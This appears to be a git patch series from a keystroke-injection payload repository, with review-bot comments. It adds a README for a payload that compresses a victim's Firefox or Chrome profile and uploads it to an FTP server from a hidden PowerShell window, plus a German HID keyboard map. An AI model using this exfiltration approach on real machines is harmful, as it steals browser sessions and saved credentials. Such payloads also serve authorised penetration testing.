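Review bot: `serveradr`, `username` and `password` are live configuration embedded in a file under version control, so the first user who fills them in and commits publishes their server credentials; mark each with `# CHANGE ME - placeholder` in the header block, or have the payload `source` a settings file that is listed in `.gitignore`. The three values are also interpolated inside double-quoted `QUACK STRING "..."` lines, so a password containing `"`, `$` or a backslash is mangled by the Croc's shell before it is typed; a comment beside `password=` should say those characters need escaping. The `Description` header reads only `Exfiltrate Firefox Profile folder via FTP server`; it should also record the assumptions the script encodes (which profile directory is archived and that the transfer is plain FTP), so a reader knows what the payload does without tracing the `QUACK` lines.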
@@ -0,0 +1,7 @@ +# Firefox profile folder upload + +Creates a powershell-script which compresses and uploads the Firefox profile-folder to a FTP-server. + +That secript get then executed in a hidden powershell window because this process may take some time... + +For Google Chrome you can use `$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default` instead. diff --git a/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt new file mode 100644 index 0000000..91c29e4 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt @@ -0,0 +1,2 @@ +# DUMMY-file needed to be in payloads-folder with version 1.3 that the payload execute propperly +# maybe not needed with newer versions! \ No newline at end of file From d0fc9ff51fc305292f5303d5ca56bb944f852ef1 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 19 May 2023 23:05:19 +0200 Subject: [PATCH 11/13] Fixed missing CRTL+ALT+DEL, ALTGR and others --- languages/de.json | 217 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 217 insertions(+) create mode 100644 languages/de.json diff --git a/languages/de.json b/languages/de.json new file mode 100644 index 0000000..796af87 --- /dev/null +++ b/languages/de.json 
@@ -0,0 +1,217 @@ +{ + "__comment":"All numbers here are in hex format and 0x is ignored.", + "__comment":" ", + "__comment":"This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment":" See section 10 Keyboard/Keypad Page (0x07)", + "__comment":" of document USB HID Usage Tables Version 1.12.", + "__comment":" ", + "__comment":"Definition of these 3 bytes can be found", + "__comment":" in section B.1 Protocol 1 (Keyboard)", + "__comment":" of document Device Class Definition for HID Version 1.11", + "__comment":" - byte 1: Modifier keys", + "__comment":" - byte 2: Reserved", + "__comment":" - byte 3: Keycode 1", + "__comment":" ", + "__comment":"Both documents can be obtained from link here", + "__comment":" http://www.usb.org/developers/hidpage/", + "__comment":" ", + "__comment":"A = LeftShift + a, { = LeftShift + [", + "__comment":" ", + "__comment":"German umlauts added by Simon Dankelmann", + "a":"00,00,04", + "b":"00,00,05", + "c":"00,00,06", + "d":"00,00,07", + "e":"00,00,08", + "f":"00,00,09", + "g":"00,00,0a", + "h":"00,00,0b", + "i":"00,00,0c", + "j":"00,00,0d", + "k":"00,00,0e", + "l":"00,00,0f", + "m":"00,00,10", + "n":"00,00,11", + "o":"00,00,12", + "p":"00,00,13", + "q":"00,00,14", + "r":"00,00,15", + "s":"00,00,16", + "t":"00,00,17", + "u":"00,00,18", + "v":"00,00,19", + "w":"00,00,1a", + "x":"00,00,1b", + "z":"00,00,1c", + "y":"00,00,1d", + "1":"00,00,1e", + "2":"00,00,1f", + "3":"00,00,20", + "4":"00,00,21", + "5":"00,00,22", + "6":"00,00,23", + "7":"00,00,24", + "8":"00,00,25", + "9":"00,00,26", + "0":"00,00,27", + "ENTER":"00,00,28", + "ESC":"00,00,29", + "ESCAPE":"00,00,29", + "TAB":"00,00,2b", + " ":"00,00,2c", + "SPACE":"00,00,2c", + "+":"00,00,30", + "#":"00,00,31", + "^":"00,00,35", + ",":"00,00,36", + ".":"00,00,37", + "-":"00,00,38", + "CAPSLOCK":"00,00,39", + "F1":"00,00,3a", + "F2":"00,00,3b", + "F3":"00,00,3c", + "F4":"00,00,3d", + "F5":"00,00,3e", + "F6":"00,00,3f", + "F7":"00,00,40", + "F8":"00,00,41", + 
"F9":"00,00,42", + "F10":"00,00,43", + "F11":"00,00,44", + "F12":"00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK":"00,00,47", + "BREAK":"00,00,48", + "PAUSE":"00,00,48", + "INSERT":"00,00,49", + "HOME":"00,00,4a", + "PAGEUP":"00,00,4b", + "DEL":"00,00,4c", + "DELETE":"00,00,4c", + "END":"00,00,4d", + "PAGEDOWN":"00,00,4e", + "RIGHT":"00,00,4f", + "RIGHTARROW":"00,00,4f", + "LEFT":"00,00,50", + "LEFTARROW":"00,00,50", + "DOWN":"00,00,51", + "DOWNARROW":"00,00,51", + "UP":"00,00,52", + "UPARROW":"00,00,52", + "<":"00,00,64", + "APP":"00,00,65", + "MENU":"00,00,65", + "ALT-TAB":"00,00,71", + "CONTROL":"01,00,00", + "CTRL":"01,00,00", + "SHIFT":"02,00,00", + "A":"02,00,04", + "B":"02,00,05", + "C":"02,00,06", + "D":"02,00,07", + "E":"02,00,08", + "F":"02,00,09", + "G":"02,00,0a", + "H":"02,00,0b", + "I":"02,00,0c", + "J":"02,00,0d", + "K":"02,00,0e", + "L":"02,00,0f", + "M":"02,00,10", + "N":"02,00,11", + "O":"02,00,12", + "P":"02,00,13", + "Q":"02,00,14", + "R":"02,00,15", + "S":"02,00,16", + "T":"02,00,17", + "U":"02,00,18", + "V":"02,00,19", + "W":"02,00,1a", + "X":"02,00,1b", + "Z":"02,00,1c", + "Y":"02,00,1d", + "!":"02,00,1e", + "\"":"02,00,1f", + "$":"02,00,21", + "%":"02,00,22", + "&":"02,00,23", + "/":"02,00,24", + "(":"02,00,25", + ")":"02,00,26", + "=":"02,00,27", + "?":"02,00,2d", + "`":"02,00,2e", + "*":"02,00,30", + "'":"02,00,31", + ";":"02,00,36", + ":":"02,00,37", + "_":"02,00,38", + ">":"02,00,64", + "CTRL-SHIFT":"03,00,00", + "ALT":"04,00,00", + "ALTGR":"40,00,00", + "CTRL-ALT":"05,00,00", + "CTRL-ALT-DELETE": "05,00,4c", + "ALT-SHIFT":"06,00,00", + "COMMAND":"08,00,00", + "GUI":"08,00,00", + "WINDOWS":"08,00,00", + "COMMAND-OPTION":"12,00,00", + "@":"40,00,14", + "{":"40,00,24", + "[":"40,00,25", + "]":"40,00,26", + "}":"40,00,27", + "\\":"40,00,2d", + "~":"40,00,30", + "|":"40,00,64", + "COMMAND-CTRL-SHIFT":"40,00,64", + "COMMAND-CTRL":"40,00,64", + "COMMAND-OPTION-SHIFT'":"40,00,64", + "ß":"00,00,2d", + "€":"40,00,08", + "§":"02,00,20", + 
"ä":"00,00,34", + "ö":"00,00,33", + "ü":"00,00,2f", + "Ä":"02,00,34", + "Ö":"02,00,33", + "Ü":"02,00,2f", + "CTRL-a":"01,00,04", + "CTRL-b":"01,00,05", + "CTRL-c":"01,00,06", + "CTRL-d":"01,00,07", + "CTRL-e":"01,00,08", + "CTRL-f":"01,00,09", + "CTRL-g":"01,00,0a", + "CTRL-h":"01,00,0b", + "CTRL-i":"01,00,0c", + "CTRL-j":"01,00,0d", + "CTRL-k":"01,00,0e", + "CTRL-l":"01,00,0f", + "CTRL-m":"01,00,10", + "CTRL-n":"01,00,11", + "CTRL-o":"01,00,12", + "CTRL-p":"01,00,13", + "CTRL-q":"01,00,14", + "CTRL-r":"01,00,15", + "CTRL-s":"01,00,16", + "CTRL-t":"01,00,17", + "CTRL-u":"01,00,18", + "CTRL-v":"01,00,19", + "CTRL-w":"01,00,1a", + "CTRL-x":"01,00,1b", + "CTRL-y":"01,00,1d", + "CTRL-z":"01,00,1c", + "CTRL-1":"01,00,1e", + "CTRL-2":"01,00,1f", + "CTRL-3":"01,00,20", + "CTRL-4":"01,00,21", + "CTRL-5":"01,00,22", + "CTRL-6":"01,00,23", + "CTRL-7":"01,00,24", + "CTRL-8":"01,00,25", + "CTRL-9":"01,00,26", + "CTRL-0":"01,00,27" +} \ No newline at end of file From 7be443645fd889a52298805ba26d1a1e1aac2c88 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 20 May 2023 11:04:24 +0200 Subject: [PATCH 12/13] Added more keyboard shortcuts --- languages/de.json | 115 +++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 114 insertions(+), 1 deletion(-) diff --git a/languages/de.json b/languages/de.json index 796af87..98b5492 100644 --- a/languages/de.json +++ b/languages/de.json @@ -18,6 +18,7 @@ "__comment":"A = LeftShift + a, { = LeftShift + [", "__comment":" ", "__comment":"German umlauts added by Simon Dankelmann", + "__comment":"CTRL-ALT+DEL, ARTGR and various shortcuts added by Mark B.", "a":"00,00,04", "b":"00,00,05", "c":"00,00,06", @@ -178,6 +179,7 @@ "Ä":"02,00,34", "Ö":"02,00,33", "Ü":"02,00,2f", + "CTRL-a":"01,00,04", "CTRL-b":"01,00,05", "CTRL-c":"01,00,06", 
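Review bot: The three entries `COMMAND-CTRL-SHIFT`, `COMMAND-CTRL` and `COMMAND-OPTION-SHIFT'` all carry `40,00,64`, which is the value of `|` (AltGr plus the `<` key) two lines above, and the last name has a stray `'` — this looks like copy-paste residue rather than a chord definition. By the modifier-bitmask convention the file documents and uses (`CTRL` 01, `SHIFT` 02, `ALT` 04, `GUI` 08, hence `CTRL-SHIFT` 03, `CTRL-ALT` 05, `ALT-SHIFT` 06), `COMMAND-CTRL` would presumably be `09,00,00`, `COMMAND-CTRL-SHIFT` `0b,00,00` and `COMMAND-OPTION-SHIFT` `0e,00,00`; confirm against the other language files before changing, since `COMMAND-OPTION` here is `12,00,00` and does not follow that pattern. Note also that the repeated `"__comment"` keys are not distinct members to a strict JSON parser, which keeps only the last one; that is an inherited convention in these files, but any loader that rejects duplicate keys will refuse the whole file.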
@@ -213,5 +215,116 @@ "CTRL-7":"01,00,24", "CTRL-8":"01,00,25", "CTRL-9":"01,00,26", - "CTRL-0":"01,00,27" + "CTRL-0":"01,00,27", + + "CTRL-ALT-a":"05,00,04", + "CTRL-ALT-b":"05,00,05", + "CTRL-ALT-c":"05,00,06", + "CTRL-ALT-d":"05,00,07", + "CTRL-ALT-e":"05,00,08", + "CTRL-ALT-f":"05,00,09", + "CTRL-ALT-g":"05,00,0a", + "CTRL-ALT-h":"05,00,0b", + "CTRL-ALT-i":"05,00,0c", + "CTRL-ALT-j":"05,00,0d", + "CTRL-ALT-k":"05,00,0e", + "CTRL-ALT-l":"05,00,0f", + "CTRL-ALT-m":"05,00,10", + "CTRL-ALT-n":"05,00,11", + "CTRL-ALT-o":"05,00,12", + "CTRL-ALT-p":"05,00,13", + "CTRL-ALT-q":"05,00,14", + "CTRL-ALT-r":"05,00,15", + "CTRL-ALT-s":"05,00,16", + "CTRL-ALT-t":"05,00,17", + "CTRL-ALT-u":"05,00,18", + "CTRL-ALT-v":"05,00,19", + "CTRL-ALT-w":"05,00,1a", + "CTRL-ALT-x":"05,00,1b", + "CTRL-ALT-y":"05,00,1d", + "CTRL-ALT-z":"05,00,1c", + "CTRL-ALT-1":"05,00,1e", + "CTRL-ALT-2":"05,00,1f", + "CTRL-ALT-3":"05,00,20", + "CTRL-ALT-4":"05,00,21", + "CTRL-ALT-5":"05,00,22", + "CTRL-ALT-6":"05,00,23", + "CTRL-ALT-7":"05,00,24", + "CTRL-ALT-8":"05,00,25", + "CTRL-ALT-9":"05,00,26", + "CTRL-ALT-0":"05,00,27", + + "CTRL-SHIFT-a":"03,00,04", + "CTRL-SHIFT-b":"03,00,05", + "CTRL-SHIFT-c":"03,00,06", + "CTRL-SHIFT-d":"03,00,07", + "CTRL-SHIFT-e":"03,00,08", + "CTRL-SHIFT-f":"03,00,09", + "CTRL-SHIFT-g":"03,00,0a", + "CTRL-SHIFT-h":"03,00,0b", + "CTRL-SHIFT-i":"03,00,0c", + "CTRL-SHIFT-j":"03,00,0d", + "CTRL-SHIFT-k":"03,00,0e", + "CTRL-SHIFT-l":"03,00,0f", + "CTRL-SHIFT-m":"03,00,10", + "CTRL-SHIFT-n":"03,00,11", + "CTRL-SHIFT-o":"03,00,12", + "CTRL-SHIFT-p":"03,00,13", + "CTRL-SHIFT-q":"03,00,14", + "CTRL-SHIFT-r":"03,00,15", + "CTRL-SHIFT-s":"03,00,16", + "CTRL-SHIFT-t":"03,00,17", + "CTRL-SHIFT-u":"03,00,18", + "CTRL-SHIFT-v":"03,00,19", + "CTRL-SHIFT-w":"03,00,1a", + "CTRL-SHIFT-x":"03,00,1b", + "CTRL-SHIFT-y":"03,00,1d", + "CTRL-SHIFT-z":"03,00,1c", + "CTRL-SHIFT-1":"03,00,1e", + "CTRL-SHIFT-2":"03,00,1f", + "CTRL-SHIFT-3":"03,00,20", + "CTRL-SHIFT-4":"03,00,21", + 
"CTRL-SHIFT-5":"03,00,22", + "CTRL-SHIFT-6":"03,00,23", + "CTRL-SHIFT-7":"03,00,24", + "CTRL-SHIFT-8":"03,00,25", + "CTRL-SHIFT-9":"03,00,26", + "CTRL-SHIFT-0":"03,00,27", + + "ALT-SHIFT-a":"06,00,04", + "ALT-SHIFT-b":"06,00,05", + "ALT-SHIFT-c":"06,00,06", + "ALT-SHIFT-d":"06,00,07", + "ALT-SHIFT-e":"06,00,08", + "ALT-SHIFT-f":"06,00,09", + "ALT-SHIFT-g":"06,00,0a", + "ALT-SHIFT-h":"06,00,0b", + "ALT-SHIFT-i":"06,00,0c", + "ALT-SHIFT-j":"06,00,0d", + "ALT-SHIFT-k":"06,00,0e", + "ALT-SHIFT-l":"06,00,0f", + "ALT-SHIFT-m":"06,00,10", + "ALT-SHIFT-n":"06,00,11", + "ALT-SHIFT-o":"06,00,12", + "ALT-SHIFT-p":"06,00,13", + "ALT-SHIFT-q":"06,00,14", + "ALT-SHIFT-r":"06,00,15", + "ALT-SHIFT-s":"06,00,16", + "ALT-SHIFT-t":"06,00,17", + "ALT-SHIFT-u":"06,00,18", + "ALT-SHIFT-v":"06,00,19", + "ALT-SHIFT-w":"06,00,1a", + "ALT-SHIFT-x":"06,00,1b", + "ALT-SHIFT-y":"06,00,1d", + "ALT-SHIFT-z":"06,00,1c", + "ALT-SHIFT-1":"06,00,1e", + "ALT-SHIFT-2":"06,00,1f", + "ALT-SHIFT-3":"06,00,20", + "ALT-SHIFT-4":"06,00,21", + "ALT-SHIFT-5":"06,00,22", + "ALT-SHIFT-6":"06,00,23", + "ALT-SHIFT-7":"06,00,24", + "ALT-SHIFT-8":"06,00,25", + "ALT-SHIFT-9":"06,00,26", + "ALT-SHIFT-0":"06,00,27" } \ No newline at end of file From 2856f9ae03774552df2cd765d5b023b886e29a32 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 20 May 2023 11:16:47 +0200 Subject: [PATCH 13/13] Added BACKSPACE --- languages/de.json | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/languages/de.json b/languages/de.json index 98b5492..4e67077 100644 --- a/languages/de.json +++ b/languages/de.json @@ -18,7 +18,7 @@ "__comment":"A = LeftShift + a, { = LeftShift + [", "__comment":" ", "__comment":"German umlauts added by Simon Dankelmann", - "__comment":"CTRL-ALT+DEL, ARTGR and various shortcuts added by Mark B.", + "__comment":"CTRL-ALT+DEL, ARTGR, BACKSPACE and various shortcuts added by Mark B.", "a":"00,00,04", "b":"00,00,05", "c":"00,00,06", 
@@ -159,6 +159,7 @@ "GUI":"08,00,00", "WINDOWS":"08,00,00", "COMMAND-OPTION":"12,00,00", + "BACKSPACE":"00,00,2a", "@":"40,00,14", "{":"40,00,24", "[":"40,00,25", @@ -179,7 +180,6 @@ "Ä":"02,00,34", "Ö":"02,00,33", "Ü":"02,00,2f", - "CTRL-a":"01,00,04", "CTRL-b":"01,00,05", "CTRL-c":"01,00,06", @@ -216,7 +216,6 @@ "CTRL-8":"01,00,25", "CTRL-9":"01,00,26", "CTRL-0":"01,00,27", - "CTRL-ALT-a":"05,00,04", "CTRL-ALT-b":"05,00,05", "CTRL-ALT-c":"05,00,06", @@ -253,7 +252,6 @@ "CTRL-ALT-8":"05,00,25", "CTRL-ALT-9":"05,00,26", "CTRL-ALT-0":"05,00,27", - "CTRL-SHIFT-a":"03,00,04", "CTRL-SHIFT-b":"03,00,05", "CTRL-SHIFT-c":"03,00,06", @@ -290,7 +288,6 @@ "CTRL-SHIFT-8":"03,00,25", "CTRL-SHIFT-9":"03,00,26", "CTRL-SHIFT-0":"03,00,27", - "ALT-SHIFT-a":"06,00,04", "ALT-SHIFT-b":"06,00,05", "ALT-SHIFT-c":"06,00,06",